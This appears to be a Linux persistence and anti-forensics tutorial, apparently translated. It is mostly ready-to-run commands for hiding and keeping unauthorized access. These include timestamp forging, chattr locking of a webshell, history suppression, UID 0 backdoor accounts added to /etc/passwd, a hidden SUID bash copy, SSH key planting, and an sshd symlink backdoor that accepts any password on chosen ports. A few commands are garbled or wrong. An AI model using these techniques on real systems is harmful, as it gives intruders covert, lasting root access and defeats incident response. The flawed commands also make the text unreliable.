File Concealment Strategies
During security assessments, defensive teams typically scan for newly created or modified files and examine sensitive directories for unauthorized uploads. To counter these detection methods, two primary approaches are employed: timestamp manipulation and file attribute locking.
Timestamp manipulation involves altering file access and modification times to match legitimate system files. File attribute locking prevents deletion and hides files from standard directory listings, effectively concealing malicious artifacts.
Timestamp Manipulation
The touch command modifies file timestamps including access time and modification time. When files don't exist, the system creates them. To synchronize timestamps:
touch -r [legitimate_file] [malicious_file]
This command makes the malicious file's timestamps identical to the target file.
File Attribute Locking
The chattr command protects critical files from accidental deletion or modification by root and administrative users. This protection isn't visible through standard ls -l output, providing effective concealment.
# Apply immutable attribute
chattr +i backdoor.php
# Attempted deletion will fail
rm -rf backdoor.php
To remove the lock:
# Check attributes
lsattr backdoor.php
# Remove immutable attribute
chattr -i backdoor.php
# Delete file
rm -rf backdoor.php
Command History Obfuscation
Linux systems maintain command execution records through the history mechanism. Clearing these traces is crucial for maintaining persistence.
# Disable history recording (precede with space)
set +o history
After executing this command, subsequent commands won't appear in history. However, this command itself remains recorded. To completely remove traces:
# Delete specific history entry
history -d [line_number]
To restore normal history functionality:
# Re-enable history recording (precede with space)
set -o history
Backdoor User Creation
Linux authentication relies on /etc/passwd and /etc/shadow files. Modern systems store encrypted passwords in /etc/shadow.
File structure meanings:
# /etc/passwd fields
username:password:UID:GID:description:home_directory:shell
# /etc/shadow fields
username:encrypted_password:last_change:min_age:max_age:warning:inactive:expire:reserved
Privileged Backdoor Accounts
When these files are modified with new account information, unauthorized access becomes possible.
Root-Level Access
If UID 0 accounts can login remotely:
# Create superuser account
echo "backdoor_user:x:0:0::/:/bin/sh" >> /etc/passwd
passwd backdoor_user
ssh backdoor_user@[target_ip]
Standard User Access
For systems blocking root SSH access:
# Create regular user
echo "backdoor_user:x:1000:1000::/:/bin/sh" >> /etc/passwd
passwd backdoor_user
ssh backdoor_user@[target_ip]
In non-interactive shells, pipe operators can construct single-line user creaiton commands.
SUID Privilege Escalasion
SUID (Set User ID) allows files to execute with the owner's privileges. When a root-owned file has SUID bit set, it runs with root permissions.
Creating a SUID backdoor:
# As root
cp /bin/bash /tmp/.hidden_backdoor
chmod 4755 /tmp/.hidden_backdoor
Detection of SUID files:
find / -user root -perm /4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
SSH Key-Based Persistence
SSH key pairs provide persistent access through authorized keys:
ssh-keygen -t rsa
echo id_rsa.pub >> .ssh/authorized_keys
Symbolic Link Backdoors
Symbolic links can create隐蔽 SSH access points:
# Verify PAM configuration
cat /etc/ssh/sshd_config | grep UsePAM
# Create backdoor (as root)
ln -sf /usr/sbin/sshd /usr/local/su
/usr/local/su -oPort=[backdoor_port]
# Connect using any password
ssh root@[ip_address] -p [backdoor_port]
To avoid detection during process enumeration, rename the symbolic link:
ln -sf /usr/sbin/sshd /tmp/[innocuous_name]
/tmp/[innocuous_name] -oPort=[backdoor_port]
Finding suitable files for symbolic links:
find /etc/pam.d | xargs grep "pam_rootok"
Example implementations:
ln -sf /usr/sbin/sshd /tmp/chsh
/tmp/chsh -oPort=23333
ln -sf /usr/sbin/sshd /tmp/chfn
/tmp/chfn -oPort=23334
ln -sf /usr/sbin/sshd /tmp/runuser
/tmp/runuser -oPort=23335